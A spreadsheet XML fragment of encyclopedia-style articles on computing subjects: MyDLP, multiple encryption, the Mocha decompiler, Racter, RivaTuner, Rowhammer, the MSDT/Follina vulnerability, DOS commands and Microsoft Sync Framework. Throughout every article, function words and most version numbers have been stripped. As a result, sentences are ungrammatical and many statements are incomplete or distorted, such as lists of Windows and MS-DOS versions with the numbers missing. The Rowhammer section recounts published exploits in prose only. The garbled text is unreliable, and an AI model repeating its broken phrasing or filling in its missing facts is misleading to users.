    <t>mydlp data loss prevention solution originally available released free open source software. supported data inspection channels include web, mail, instant messaging, file transfer removable storage devices printers. mydlp development project originally made source code available terms general public license.mydlp first free software projects data loss prevention, acquired comodo group 2014. comodo since begun marketing enterprise version comodo security solutions subsidiary, free version removed website. open source code updated since early 2014. subprojects october 2010, mydlp included following subprojects: mydlp network: network server project, used high load network operations intercepting connections hosting mydlp network services. mydlp endpoint: remote agent project, endpoint machines order inspect user operations copying file external device, printing document capturing screenshots. mydlp management interface system administrators configure mydlp. pushed relevant parts system configuration mydlp network mydlp endpoint. platforms interfaces mydlp network mostly written erlang, performance concurrent network operations. python also used exceptional cases. this subsystem could platform supported erlang python.mydlp endpoint developed windows platforms, written c++, c#.mydlp written adobe flex. used mysql order store user configurations. features october 2010, mydlp included widespread data loss prevention features text extraction binary formats, incident management queue, source code detection data identification methods bank account, credit card several national identification numbers. besides, features like data classification statistical analysis trained sentences native language processor integrated naive bayes classifier claimed included. references external links official website</t>
  </si>
  <si>
    <t>Multiple encryption</t>
  </si>
  <si>
    <t>multiple encryption process encrypting already encrypted message times, either using different algorithm. also known cascade encryption, cascade ciphering, multiple encryption, superencipherment. superencryption refers outer-level encryption multiple encryption. some cryptographers, like matthew green johns hopkins university, multiple encryption addresses problem mostly exist: modern ciphers rarely broken... you’re likely malware implementation suffer catastrophic attack aes. .... quote lies reason multiple encryption, namely poor implementation. using different cryptomodules keying processes different vendors requires vendors' wares compromised security fail completely. independent keys picking ciphers, used both, second cipher could possibly undo first cipher, partly entirely. this true ciphers decryption process exactly encryption process—the second cipher would completely undo first. attacker recover cryptanalysis first encryption layer, attacker could possibly decrypt remaining layers, assuming used layers. prevent risk, keys statistically independent layer (e.g. independent rngs). ideally separate different generation, sharing, management processes. independent initialization vectors en/decryption processes require sharing initialization vector (iv) nonce typically, openly shared made known recipient (and everyone else). good security policy never provide data plaintext ciphertext using therefore, recommended (although moment without specific evidence) separate layer encryption. importance first layer with exception one-time pad, cipher theoretically proven unbreakable. furthermore, recurring properties found ciphertexts generated first cipher. since ciphertexts plaintexts used second cipher, second cipher rendered vulnerable attacks based known plaintext properties (see references below). this case first layer program always adds string characters beginning end) ciphertexts (commonly known magic number). when found file, string allows operating system know program launched order decrypt file. this string removed adding second layer. prevent kind attack, method provided bruce schneier: generate random size plaintext. encrypt using first cipher key. plaintext pad, encrypt result using second cipher different key. concatenate ciphertexts order build final ciphertext.a cryptanalyst must break ciphers information. this will, however, drawback making ciphertext twice long original plaintext. note, however, weak first cipher merely make second cipher vulnerable chosen plaintext attack also vulnerable known plaintext attack. however, block cipher must vulnerable chosen plaintext attack considered secure. therefore, second cipher described secure definition, either. consequently, ciphers still need broken. attack illustrates strong assumptions made secure block ciphers ciphers even partially broken never used. rule rule data security principle nsa's commercial solutions classified program (csfc). specifies completely independent layers cryptography protect data. example, data could protected hardware encryption lowest level software encryption application layer. could mean using fips-validated software cryptomodules different vendors en/decrypt data. importance vendor and/or model diversity layers components centers around removing possibility manufacturers models share vulnerability. this components compromised still entire layer encryption protecting information rest transit. csfc program offers solutions achieve diversity ways. "the first implement layer using components produced different manufacturers. second components manufacturer, manufacturer provided sufficient evidence implementations components independent another."the principle practiced nsa's secure mobile phone called fishbowl. phones layers encryption protocols, ipsec secure real-time transport protocol (srtp), protect voice communications. samsung galaxy tactical edition also approved csfc component. examples figure shows inside outside process encrypted capsule formed context echo protocol, used software application goldbug messenger. goldbug implemented hybrid system authenticity confidentiality.first layer encryption: ciphertext original readable message hashed, subsequently symmetric keys encrypted asymmetric e.g. deploying algorithm rsa. intermediate step ciphertext, hash digest ciphertext combined capsule, packed together. follows approach: encrypt-then-mac. order receiver verify ciphertext tampered with, digest computed ciphertext decrypted. second layer encryption: optionally still possible, therefore encrypt capsule first layer addition aes-256, comparable commonly shared, 32-character long symmetric password. hybrid encryption added multiple encryption. third layer encryption: then, capsule transmitted secure ssl/tls connection communication partner references further reading</t>
  </si>
  <si>
    <t>Mocha (decompiler)</t>
  </si>
  <si>
    <t>mocha java decompiler, allows programmers translate program's bytecode source code. beta version mocha released 1996, dutch developer hanpeter vliet, alongside obfuscator named crema. controversy erupted temporarily withdrew mocha public distribution. 2009 program still available distribution, used freely long modified. borland's jbuilder includes decompiler based mocha. vliet's websites went offline died cancer december 1996 also (java decompiler) references external links official website</t>
  </si>
  <si>
    <t>Racter</t>
  </si>
  <si>
    <t>racter artificial intelligence computer program generates english language prose random. published 1984 mindscape. history more iron, lead, gold need electricity.i need need lamb pork lettuce cucumber.i need dreams. racter, short raconteur, written william chamberlain thomas etter. existence program revealed 1983 book called policeman's beard half constructed (isbn 0-446-38051-2), described composed entirely program. program originally written supported file names characters long, causing name shorted racter later adapted cp/m machine written "compiled basic micro ram." this version, program allegedly wrote book, released general public. sophistication claimed program likely exaggerated, could seen investigation template system text generation.however, 1984 mindscape released interactive version racter, developed inrac corporation, compatibles, amiga, apple computers. published racter similar chatterbot. basic program released mindscape less sophisticated anything could written fairly sophisticated prose policeman's beard. commercial version racter could likened computerized version libs, game fill blanks advance plug text template produce surrealistic tale. commercial program attempted parse text inputs, identifying significant nouns verbs, would regurgitate create "conversations", plugging input user phrase templates combined, along modules conjugated english verbs.by contrast, text policeman's beard, apart edited large amount output, would product chamberlain's specialized templates modules, included commercial release program. reception magazine described policeman's beard's scenes "surprising frankness" "reflective". concluded book "whimsical wise sometimes fun". computer gaming world described racter diversion another dimension might best seen paying price ticket. (try buy!)"an article york times said racter edge artificial insanity. also states racter's always-changing sentences grammatically correct, often funny and, computer, sometimes profound. article contains examples showing interaction racter, often racter asking user questions. also david cope eliza megahal references external links racter mobygames policeman's beard half constructed (pdf html) racter download ms-dos based computers, including original template files. getting computer write about itself bill chamberlain racter august 1993 issue journal computer game design</t>
  </si>
  <si>
    <t>RivaTuner</t>
  </si>
  <si>
    <t>rivatuner freeware overclocking hardware monitoring program first developed alexey nicolaychuk 1997 nvidia video cards. pioneering application influenced (and cases integrated into) design subsequent freeware graphics card overclocking monitoring utilities. supports nvidia gpus riva geforce series, also limited support ati/amd radeon series video cards radeon 8500 above.for users supported gpus, rivatuner commonly used software tools overclocking. allows user perform driver-level direct3d opengl tweaking graphical interface also enables low-level hardware monitoring. supported nvidia drivers versions detonator 2.08 forceware versions released 2009. rivatuner currently works windows 2000, windows server 2003 x32, windows windows vista, windows windows windows windows also works older windows without official support. rivatuner last updated 2009. since licensed computer hardware vendors integrated various overclocking utilities, including afterburner, evga precision (prior version 16), asus tweak. 2014, evga terminated contract alexey subsequently discovered engaged source code theft releasing clone rivatuner claimed in-house design. resulting community reaction caused evga redesign overclocking tool.rivatuner statistics server (rtss), initially companion software rivatuner, since evolved frame rate hardware monitor supports video capture frame limiting. unlike rivatuner, rtss continues receive updates and, 2017, supports performance monitoring latest graphics cards apis. rtss bundled afterburner, afterburner require installation rtss function. features some features rivatuner are: multi-monitor support. built-in registry editor. overclocking tool. support hardware monitoring module nvidia technologies. control. supports logitech panel. also tweaking overclocking references external links rivatuner interview 2012 videocardz.com rivatuner english homepage</t>
  </si>
  <si>
    <t>Row hammer</t>
  </si>
  <si>
    <t>hammer (also written rowhammer) security exploit takes advantage unintended undesirable side effect dynamic random-access memory (dram) memory cells interact electrically leaking charges, possibly changing contents nearby memory rows addressed original memory access. this circumvention isolation dram memory cells results high cell density modern dram, triggered specially crafted memory access patterns rapidly activate memory rows numerous times.the hammer effect used privilege escalation computer security exploits, network-based attacks also theoretically possible.different hardware-based techniques exist prevent hammer effect occurring, including required support processors types dram memory modules. background dynamic (dram), stored data occupies separate memory cell electrically implemented capacitor transistor. charge state capacitor (charged discharged) determines whether dram cell stores binary value. huge numbers dram memory cells packed integrated circuits, together additional logic organizes cells purposes reading, writing, refreshing data.memory cells (blue squares illustrations) organized matrices addressed rows columns. memory address applied matrix broken address column address, processed column address decoders illustrations, vertical horizontal green rectangles, respectively). after address selects read operation (the selection also known activation), bits cells transferred sense amplifiers form buffer (red squares illustrations), exact selected using column address. consequently, read operations destructive nature design dram requires memory cells rewritten values read transferring cell charges buffer. write operations decode addresses similar way, result design entire rows must rewritten value single changed.: result storing data bits using capacitors natural discharge rate, dram memory cells lose state time require periodic rewriting memory cells, process known refreshing.: another result design, dram memory susceptible random changes stored data, known soft memory errors attributed cosmic rays causes. there different techniques counteract soft memory errors improve reliability dram, error-correcting code (ecc) memory advanced variants (such lockstep memory) commonly used. overview increased densities dram integrated circuits physically smaller memory cells containing less charge, resulting lower operational noise margins, increased rates electromagnetic interactions memory cells, greater possibility data loss. result, disturbance errors observed, caused cells interfering other's operation manifesting random changes values bits stored affected memory cells. awareness disturbance errors dates back early 1970s intel 1103 first commercially available dram integrated circuits; since then, dram manufacturers employed various mitigation techniques counteract disturbance errors, improving isolation cells performing production testing. however, researchers proved 2014 analysis commercially available ddr3 sdram chips manufactured 2012 2013 susceptible disturbance errors, using term hammer name associated side effect observed flips.the opportunity hammer effect occur ddr3 memory primarily attributed ddr3's high density memory cells results associated interactions cells, rapid dram activations determined primary cause. frequent activations cause voltage fluctuations associated selection lines, observed induce higher-than-natural discharge rates capacitors belonging nearby (adjacent, cases) memory rows, called victim rows; affected memory cells refreshed lose much charge, disturbance errors occur. tests show disturbance error observed performing around 139,000 subsequent memory accesses (with cache flushes), memory cell every 1,700 cells susceptible. those tests also show rate disturbance errors substantially affected increased environment temperature, depends actual contents dram certain patterns result significantly higher disturbance error rates.a variant called double-sided hammering involves targeted activations dram rows surrounding victim row: illustration provided section, variant would activating yellow rows inducing flips purple row, case would victim row. tests show approach result significantly higher rate disturbance errors, compared variant activates victim row's neighboring dram rows.: 19–20 mitigation different methods exist less successful detection, prevention, correction mitigation hammer effect. tests show simple error correction code, providing single-error correction double-error detection (secded) capabilities, able correct detect observed disturbance errors include flipped bits memory word.: furthermore, research shows precisely targeted three-bit hammer flips prevents memory noticing modifications.a less effective solution introduce frequent memory refreshing, refresh intervals shorter usual technique results higher power consumption increased processing overhead; vendors provide firmware updates implement type mitigation. complex prevention measures performs counter-based identification frequently accessed memory rows proactively refreshes neighboring rows; another method issues additional infrequent random refreshes memory rows neighboring accessed rows regardless access frequency. research shows prevention measures cause negligible performance impacts.: 10–11 since release bridge microarchitecture, intel xeon processors support so-called pseudo target refresh (ptrr) used combination ptrr-compliant ddr3 dual in-line memory modules (dimms) mitigate hammer effect automatically refreshing possible victim rows, negative impact performance power consumption. when used dimms ptrr-compliant, xeon processors default fall back performing dram refreshes twice usual frequency, results slightly higher memory access latency reduce memory bandwidth 2–4%.the lpddr4 mobile memory standard published jedec includes optional hardware support so-called target refresh (trr) prevents hammer effect without negatively impacting performance power consumption. additionally, manufacturers implement ddr4 products, although part ddr4 memory standard published jedec. internally, identifies possible victim rows, counting number activations comparing predefined chip-specific maximum activate count (mac) maximum activate window (tmaw) values, refreshes rows prevent flips. value maximum total number activations encountered particular dram within time interval equal shorter tmaw amount time neighboring rows identified victim rows; also flag victim activations neighboring rows reaches limit within tmaw time window.due necessity huge numbers rapidly performed dram activations, hammer exploits issue large numbers uncached memory accesses cause cache misses, detected monitoring rate cache misses unusual peaks using hardware performance counters.version memtest86 memory diagnostic software, released december 2013, added hammer test checks whether computer susceptible disturbance errors, works computer boots uefi; without uefi, boots older version hammer test. implications memory protection, preventing processes accessing memory assigned them, concepts behind modern operating systems. using memory protection combination security-related mechanisms protection rings, possible achieve privilege separation processes, programs computer systems general divided parts limited specific privileges require perform particular task. using privilege separation also reduce extent potential damage caused computer security attacks restricting effects specific parts system.disturbance errors (explained section above) effectively defeat various layers memory protection "short circuiting" hardware level, practically creating unique attack vector type allows processes alter contents arbitrary parts main memory directly manipulating underlying memory hardware. comparison, "conventional" attack vectors buffer overflows circumventing protection mechanisms software level, exploiting various programming mistakes achieve alterations otherwise inaccessible main memory contents. exploits initial research hammer effect, published june 2014, described nature disturbance errors indicated potential constructing attack, provide examples working security exploit. subsequent october 2014 research paper imply existence security-related issues arising hammer effect.on march 2015, google's project zero revealed working privilege escalation exploits based hammer effect, establishing exploitable nature x86-64 architecture. revealed exploits targets google native client (nacl) mechanism running limited subset x86-64 machine instructions within sandbox,: exploiting hammer effect escape sandbox gain ability issue system calls directly. this nacl vulnerability, tracked cve-2015-0565, mitigated modifying nacl allow execution clflush (cache line flush) machine instruction, previously believed required constructing effective hammer attack.the second exploit revealed project zero runs unprivileged linux process x86-64 architecture, exploiting hammer effect gain unrestricted access physical memory installed computer. combining disturbance errors memory spraying, exploit capable altering page table entries: used virtual memory system mapping virtual addresses physical addresses, results exploit gaining unrestricted memory access.: 36–57 nature inability x86-64 architecture make clflush privileged machine instruction, exploit hardly mitigated computers hardware built-in hammer prevention mechanisms. while testing viability exploits, project zero found half tested laptops experienced disturbance errors, occurring vulnerable laptops less five minutes running row-hammer-inducing code; tested laptops manufactured 2010 2014 used non-ecc ddr3 memory.in july 2015, group security researchers published paper describes architecture- instruction-set-independent exploiting hammer effect. instead relying clflush instruction perform cache flushes, approach achieves uncached memory accesses causing high rate cache eviction using carefully selected memory access patterns. although cache replacement policies differ processors, approach overcomes architectural differences employing adaptive cache eviction strategy algorithm.: 64–68 proof concept approach provided native code implementation, pure javascript implementation runs firefox javascript implementation, called rowhammer.js, uses large typed arrays relies internal allocation using large pages; result, demonstrates high-level exploit low-level vulnerability.in october 2016, researchers published drammer, android application uses hammer, together methods, reliably gain root access several popular smartphones. vulnerability acknowledged cve-2016-6728 mitigation released google within month. however, general nature possible implementations attack, effective software patch difficult reliably implemented. june 2018, patch proposals made academia industry either impractical deploy insufficient stopping attacks. mitigation, researchers proposed lightweight defense prevents attacks based direct memory access (dma) isolating buffers guard rows.in 2021, google research team announced exploit, half-double takes advantage worsening physics newer dram chips. also memory scrambling memory controller feature turns user data written memory pseudo-random patterns radiation hardening making electronic components resistant damage malfunctions caused ionizing radiation single event upset change state caused ions electromagnetic radiation striking sensitive node electronic device soft error type error involving erroneous changes signals data changes underlying device circuit notes references external links some notes dram (#rowhammer), march 2015, robert graham rowhammer hardware threatens smash notebook security, infoworld, march 2015, serdar yegulalp ddr3 memory known failure mechanism called "row hammer" youtube, july 2014, barbara aichinger patent 20140059287 hammer refresh command, february 2014, kuljit bains hammer privilege escalation vulnerability, cisco systems security advisory, march 2015 armor: run-time memory hot-row detector, university manchester, mohsen ghasempour using memory errors attack virtual machine, march 2003, sudhakar govindavajhala andrew appel program testing dram "rowhammer" problem, source code github</t>
  </si>
  <si>
    <t>Microsoft Support Diagnostic Tool</t>
  </si>
  <si>
    <t>microsoft support diagnostic tool (msdt) service microsoft windows allows microsoft technical support agents analyze diagnostic data remotely troubleshooting purposes. april 2022 observed security vulnerability allowed remote code execution exploited attack computers russia belarus, later tibetan government exile. microsoft advised temporary workaround disabling msdt editing windows registry. when contacting support user told msdt given unique "passkey" enter. they also given "incident number" uniquely identify case. msdt also offline generate .cab file uploaded computer internet connection. windows versions windows windows windows windows also follina (security vulnerability) references</t>
  </si>
  <si>
    <t>RESTORE (DOS command)</t>
  </si>
  <si>
    <t>this article presents list commands used operating systems, especially used x86-based compatibles (pcs). other operating systems part scope list. dos, many standard system commands provided common tasks listing files disk moving files. some commands built command interpreter, others existed external commands disk. over several generations dos, commands added additional functions operating system. current microsoft windows operating system, text-mode command prompt window, cmd.exe, still used. command processing command interpreter runs application programs running. when application exits, transient portion command interpreter memory overwritten, reload disk. some commands internal—built command.com; others external commands stored disk. when user types line text operating system command prompt, command.com parse line attempt match command name built-in command name executable program file batch file disk. match found, error message printed, command prompt refreshed. external commands large keep command processor, less frequently used. such utility programs would stored disk loaded like regular application programs distributed operating system. copies utility command programs accessible disk, either current drive command path command interpreter. list below, commands accept file name, filename including wildcards said accept filespec (file specification) parameter. commands accept single file name said accept filename parameter. additionally, command line switches, parameter strings, supplied command line. spaces symbols used allow command processor parse command line filenames, file specifications, options. command interpreter preserves case whatever parameters passed commands, command names file names case-insensitive. many commands across many systems, differ command syntax name. commands partial list common commands ms-dos follows below. append sets path searched data files displays current search path. append command similar path command tells search program files (files .com, exe, .bat file name extension). command available ms-dos versions later. assign command redirects requests disk operations drive different drive. also display drive assignments reset drive letters original assignments. command available ms-dos versions releases atmdm lists connections addresses seen windows call manager. attrib attrib changes views attributes files. defaults display attributes files current directory. file attributes available include read-only, archive, system, hidden attributes. command capability process whole folders subfolders files also process files. command available ms-dos versions later. backup restore these commands backup restore files external disk. these appeared version continued ms-dos deversioned check). replaced commercial programs (cpbackup, msbackup), allowed files restored different locations. basic basica implementation basic programming language pcs. implementing basic common operating systems 16-bit machines made 1980s. computers basic rom, ibm's versions basic used code rom-basic, allowed extra memory code area. basica last appeared 5.02, os/2 (2.0 later), version rom-basic moved program code. microsoft released gw-basic machines rom-basic. some releases basic.com basica.com loaders gw-basic.exe. basic dropped ms-dos 5.02. os/2 (which uses ms-dos not. break this command used instruct check whether ctrl break keys pressed carrying program request. command available ms-dos versions later. call starts batch file within another batch file returns ends. command available ms-dos versions later. chdir chdir alternative name command either displays changes current working directory. command available ms-dos versions later. chcp command either displays changes active code page used display character glyphs console window. similar functionality achieved mode con: select=yyy. command available ms-dos versions later. chkdsk chkdsk verifies storage volume (for example, hard disk, disk partition floppy disk) file system integrity. command ability errors volume recover information defective disk sectors volume. command available ms-dos versions later. choice choice command used batch files prompt user select item single-character choices. choice introduced external command ms-dos 6.0; novell 7.0. earlier versions dr-dos supported function built-in switch command (for numeric choices) beginning command question mark. this command formerly called (yes-no-cancel). clrscr command clears terminal screen. command available ms-dos versions later. command start instance command interpreter. command available ms-dos versions later. comp show differences files, sets files. command available ms-dos versions releases copy makes copies existing files. command available ms-dos versions later. ctty defines terminal device (for example, com1) input output.the command available ms-dos versions later. date displays system date prompts user enter date. complements time command. command available ms-dos versions later. dblboot (not command: this batch file added supplemental disks help create doublespace boot floppies.) dblspace disk compression utility supplied ms-dos version (released 1993) version 6.2. debug primitive assembler disassembler. defrag command ability analyze file fragmentation disk drive defragment drive. this command called defrag ms-dos/pc diskopt dr-dos. command available ms-dos versions later. erase alternative form erase) used delete files. command available ms-dos versions later. deltree deletes directory along files subdirectories contains. normally, confirmation potentially dangerous action. since (rmdir) command delete directory directory empty (except windows 10), deltree command used delete whole directory. deltree command included certain versions microsoft windows ms-dos operating systems. specifically available versions ms-dos higher, microsoft windows windows functionality provided exists handled command rmdir slightly different syntax. this command present windows windows command switch rmdir command displays contents directory. contents comprise disk's volume label serial number; directory filename line, including filename extension, file size bytes, date time file last modified; total number files listed, cumulative size, free space bytes) remaining disk. command commands exist first versions dos. command display files subdirectories. resulting directory listing sorted various criteria filenames displayed chosen format. diskcomp command comparing complete contents floppy disk another one. command available ms-dos versions later releases later. diskcopy command copying complete contents diskette another diskette. command available ms-dos versions later. doskey command adds command history, macro functionality, improved editing features command-line interpreter. command available ms-dos versions later. dossize displays much memory various components occupy. drvspace disk compression utility supplied ms-dos version 6.22. echo echo command prints arguments back equivalent standard output stream. (hence name, echo) usually, means directly screen, output echo redirected, like command, files devices. often used batch files print text user. another important echo command toggle echoing commands batch files. traditionally batch files begin @echo statement. this says interpreter echoing commands whole execution batch file, thus resulting "tidier" output (the symbol declares particular command (echo off) also executed without echo.) command available ms-dos versions later. edit edit full-screen text editor, included ms-dos versions os/2 windows corresponding program windows later, windows 2000 later edit v2.0. later editor dr-dos used editor version edlin line-editor. used script file, like debug, makes even today. absence console editor ms-dos/pc created after-market third-party editors. extra command added give user much-needed help. last version contain edlin; ms-dos supplemental disks, base install. windows 32-bit, os/2 edlin. emm386 emm386 command enables disables emm386 expanded-memory support computer 80386 higher processor. command available ms-dos versions later. erase see: erase exe2bin converts executable (.exe) file binary file extension .com, memory image program. size resident code data sections combined input .exe file must less file must also stack segment. command available ms-dos versions available separately version supplemental disk. exit exits current command processor. exit used primary command, effect unless window microsoft windows, case window closed user returns desktop. command available ms-dos versions later. expand microsoft file expansion utility used uncompress compressed cabinet files (.cab). command dates back 1990 supplied floppy disc ms-dos versions later. fakemous fakemous ps/2 mouse utility used accessdos. included ms-dos supplemental disk. accessdos assists persons disabilities. fasthelp provides information ms-dos commands. fastopen command provides accelerated access frequently-used files directories. command available ms-dos versions later. show differences files, sets files. command available ms-dos versions later primarily non-ibm releases. fdisk fdisk command manipulates hard disk partition tables. name derives ibm's habit calling hard drives fixed disks. fdisk ability display information about, create, delete partitions logical drive. also install standard master boot record hard drive. command available ms-dos versions later releases later. find find command filter find lines input data stream contain contain specified string send output data stream. also used pipe. command available ms-dos versions later. findstr findstr command grep-oriented find-like utility. among uses logical-or lacking find. would find files above-listed words yes, maybe. iteration: repeats command specified files. loop used parse file output command. command available ms-dos versions later. format deletes entries root directory drive/partition, reformats ms-dos. cases, used floppy drives removable media. this command potentially erase everything computer's drive. command available ms-dos versions later. goto goto command transfers execution specified label. labels specified beginning line, colon (:likethis). command available ms-dos versions later.used batch files. graftabl graftabl command enables display extended character graphics mode.the command available ms-dos versions graphics program enable sending graphical screen dump printer pressing &lt;print screen&gt;. command available ms-dos versions later releases later. help gives help commands. command available ms-dos versions thru windows full-screen command help available ms-dos versions later. beginning windows command processor "dos" offers builtin-help commands using (e.g. copy conditional statement, allows branching program execution. evaluates specified condition, true, executes remainder command line. otherwise, skips remainder line continues next command line. used batch files. command available ms-dos versions later. intersvr interlnk ms-dos; filelink dr-dos. network using null modem cable laplink cable. server-side version interlnk, also immobilizes machine running active opposed app) must running transfer take place. dr-dos' filelink executed client server. 5.02, ms-dos 6.0. join join command attaches drive letter specified directory another drive. opposite achieved subst command. command available ms-dos versions available separately versions later supplemental disk. keyb keyb command used select keyboard layout. command available ms-dos versions later.from 3.21, instead per-country commands, namely keybfr, keybgr, keybit, keybsp keybuk. label changes label logical drive, hard disk partition floppy disk. command available ms-dos versions later releases later. link4 microsoft 8086 object linker loadfix loads program first memory, runs program. command available ms-dos versions later. included ms-dos/pc dos. dr-dos used memmax, opened closed lower, upper, video memory access, block lower memory. loadhigh command loads program upper memory area. command available ms-dos versions later.it called hiload dr-dos. mkdir makes directory. parent directory specified created already exist. command available ms-dos versions later. displays memory usage. capable displaying program size status, memory use, internal drivers. external command. command available ms-dos versions later releases later.on earlier versions memory usage could shown running chkdsk. parameter could used show memory usage. memmaker starting version ms-dos included external program memmaker used free system memory (especially conventional memory) automatically reconfiguring autoexec.bat config.sys files. this usually done moving programs device drivers upper memory. whole process required system restarts. before first restart user asked whether enable memory, since expanded memory required reserved 64kib region upper memory. first restart inserted sizer.exe program gauged memory needed driver. memmaker would calculate optimal driver placement upper memory modify autoexec.bat config.sys accordingly, reboot second time.memmaker.exe sizer.exe developed microsoft helix software company eliminated starting ms-dos (windows 95); however, could obtained microsoft's server part olddos.exe package, alongside tools. uses another program called ramboost optimize memory, working either dos's himem/emm386 third-party memory manager. ramboost licensed central point software. mirror mirror command saves disk storage information used recover accidentally erased files. command available ms-dos version available separately versions later supplemental disk. mode configures system devices. changes graphics modes, adjusts keyboard settings, prepares code pages, sets port redirection.the command available ms-dos versions later releases later. more more command paginates text, view files containing screen text. more also used filter. while viewing more text, return displays next line, space displays next page. command available ms-dos versions later. move moves files renames directories. command available ms-dos versions later.dr-dos used separate command renaming directories, rendir. msav command scans computer known viruses.the command available ms-dos versions later. msbackup msbackup command used backup restore files disk another. york times said msbackup much better faster backup command used earlier versions dos, lack advanced features found backup software packages sold separately. there another offering, named mwbackup, gui-oriented. introduced windows workgroups (3.11).the msbackup command available ms-dos versions later. mscdex mscdex driver executable allows programs recognize, read, control cd-roms. command available ms-dos versions later. command provides detailed technical information computer's hardware software. ms-dos version command qconfig. command appeared first word2, windows 3.10. msherc msherc.com (also qbherc.com) (terminate stay resident) graphics driver supplied microsoft quickc, quickbasic, compiler, allow hercules adapter high-resolution graphics capability (720 348, colors). nlsfunc loads extended nationalization localization support country.sys, changed codepage drivers system modules resident ram.in later versions dr-dos nlsfunc relocated himem area, thereby freeing portion nearly invaluable lower 640kib constituted ”conventional” memory available software.the command available ms-dos versions later. path displays sets search path executable files. command available ms-dos versions later. pause suspends processing batch program displays message press continue. given text display. command available ms-dos versions later. ping allows user test availability network connection specified host. hostnames usually resolved addresses.it included many versions; typically ones network stacks diagnostic tool. power power command used turn power management off, report status power management, levels power conservation. external command implemented power.exe.the command available ms-dos versions later. print print command adds removes files print queue. this command introduced ms-dos version before built-in support background printing files. user would usually copy command copy files lpt1. printfix prompt prompt command allows user change prompt command screen. default prompt (i.e. prompt $p), displays drive current path prompt, changed anything. prompt displays current system date prompt. type prompt screen help function. command available ms-dos versions later releases later. utility inspired unix/xenix command. also provides full-screen mode, similar utility unix systems. qbasic integrated development environment basic interpreter. command available ms-dos versions later. rmdir remove directory (delete directory); default directories must empty files command succeed. command available ms-dos versions later.the deltree command versions ms-dos versions windows removes non-empty directories. recover primitive filesystem error recovery utility included ms-dos dos. command available ms-dos versions remark (comment) command, normally used within batch file, dr-dos, pc/ms-dos above, config.sys. this command processed command processor. thus, output redirected create zero-byte file. useful logged sessions screen-captures. might comments labels, usually starting double-colon (::). these processed command processor. command renames file. unlike move command, command cannot used rename subdirectories, rename files across drives. mass renames accomplished wildcards characters asterisk question mark (?).the command available ms-dos versions later. replace command used replace existing computer files files target directory. command available ms-dos versions later. restore see: backup restore scandisk disk diagnostic utility. scandisk replacement chkdsk utility, starting ms-dos version later. primary advantages chkdsk reliable ability surface scan finds marks clusters disk. also provided mouse point-and-click tui, allowing interactive session complement command-line batch run. chkdsk surface scan cluster detection functionality included, used windows nt-based operating systems. select select command formats disk installs country-specific information keyboard codes. initially available dos. version included hard-coded transfer operating system onward specify source destination, used install harddisk. version included ms-dos longer simple command-line utility, full-fledged installer. command available ms-dos versions releases 4.this command longer included version later, replaced setup. sets environment variables. command available ms-dos versions later.cmd.exe windows 2000, 4dos, 4os2, 4nt, number third-party solutions allow direct entry environment variables command prompt. from least windows 2000, command allows evaluation strings variables, thus providing inter alia means performing integer arithmetic. setup command available ms-dos versions later. this command computer setup. with computers running versions later, runs computer setup, windows setup windows setup. setver setver program designed return different value version running. this allows programs look specific version different dos. command available ms-dos versions later. share installs support file sharing locking capabilities. command available ms-dos versions later. shift shift command increases number replaceable parameters standard batch files. this done changing position replaceable parameters. replaces replacement parameters subsequent (e.g. etc.). command available ms-dos versions later. sizer external command sizer.exe intended started directly command prompt. used memmaker memory-optimization process. smartdrv command available ms-dos versions later. sort filter sort lines input data stream send output data stream. similar unix command sort. handles files 64k. this sort always case insensitive.the command available ms-dos versions later. subst utility subdirectory drive letter. opposite achieved join command. command available ms-dos versions later. utility make volume bootable. rewrites volume boot code (the first sector partition acting code, executed, look io.sys. also copies core system files, io.sys, msdos.sys, command.com, volume. rewrite master boot record, contrary widely held belief. command available ms-dos versions later. telnet telnet client tool developers administrators help manage test network connectivity. time display system time waits user enter time. complements date command. command available ms-dos versions later. title enables user change title ms-dos window. tree external command, graphically displays path directory sub-directories specified drive. command available ms-dos versions later releases later. truename internal command expands name file, directory, drive, display absolute pathname result. expand relative pathnames, subst drives, join directories, find actual directory. example, 7.1, current directory c:\windows\system, argument need refer existing file directory: truename output absolute pathname did. also truename search path. example, current directory c:\temp, truename command.com display c:\temp\command.com (which exist), c:\dos\command.com (which path). this command displays pathnames mapped network local drives. this command undocumented command. help switch "/?" defines "reserved command name". available ms-dos version 5.00 later, including windows 95/98/me. library function realpath performs function. microsoft windows command processors support command, including versions command.com type displays file. command frequently used conjunction command, e.g. type long-text-file more. type used concatenate files (type file1 file2 file3); however work large files—use copy command instead. command available ms-dos versions later. undelete restores file previously deleted del. default recoverable files working directory restored; options used change behavior. ms-dos mirror program used, deletion tracking files created used undelete. command available ms-dos versions later. unformat unformat command used undo effects formatting disk. command available ms-dos versions later. internal command, reports version presently running, since ms-dos whether loaded high. command available ms-dos versions later. verify enables disables feature determine files correctly written disk. parameter provided, command display current setting.the command available ms-dos versions later. internal command displays disk volume label serial number. command available ms-dos versions later. vsafe program continuously monitors computer viruses. command available ms-dos versions later. xcopy copy entire directory trees. xcopy version copy command move files directories location another. xcopy usage attributes obtained typing xcopy command line. command available ms-dos versions later. also category:windows commands command-line interface list config.sys directives timeline operating systems references further reading cooper, (2001). special edition using ms-dos 6.22, third edition. publishing. isbn 978-0789725738. wolverton, (1990). ms-dos commands: microsoft quick reference, revised edition. microsoft press. isbn 978-1556152894. external links command-line reference microsoft technet database "command-line reference" ms-dos technical reference technet contains official microsoft ms-dos command reference documention. dr-dos 7.03 online manual mdgx ms-dos undocumented hidden secretsthere several guides commands available licensed free documentation license: freedos spec sourceforge plaintext specification, written 1999, commands work freedos ms-dos commands reference windows commands examples collection undocumented obscure features various ms-dos versions</t>
  </si>
  <si>
    <t>Microsoft Sync Framework</t>
  </si>
  <si>
    <t>microsoft sync framework data synchronization platform microsoft used synchronize data across multiple data stores. sync framework includes transport-agnostic architecture, data store-specific synchronization providers, modelled ado.net data provider api, plugged sync framework used offline access data, working cached data submitting changes master database batch, well synchronize changes data source across consumers (publish/subscribe sync) peer-to-peer synchronization multiple data sources. sync framework features built-in capabilities conflict detection whether data changed already updated flag manual inspection defined policies resolve conflict. sync services includes embedded server compact database store metadata synchronization relationships well sync attempt. sync framework surfaced managed code, .net framework applications, well unmanaged code, applications. scheduled ship visual studio 2008 late november 2007. architecture sync framework runtime provides synchronization functionality, without tied data store data transport protocols. providing data source specific synchronization providers, data source supported. example, using proper synchronization providers, files synchronized across computers, project updates synchronized across project participants, media synchronized across devices. sync framework ships three providers: microsoft sync services ado.net, sync services file systems, sync services sse. sync services used synchronize devices supplying providers device. similarly, software microsoft office outlook media libraries windows media player also supported providing suitable providers. providers used enumerate items data store, identified item addition, also maintain synchronization metadata state data store, changes enumerated quickly. metadata maintained every instance data store (replica) provider attached metadata maintained 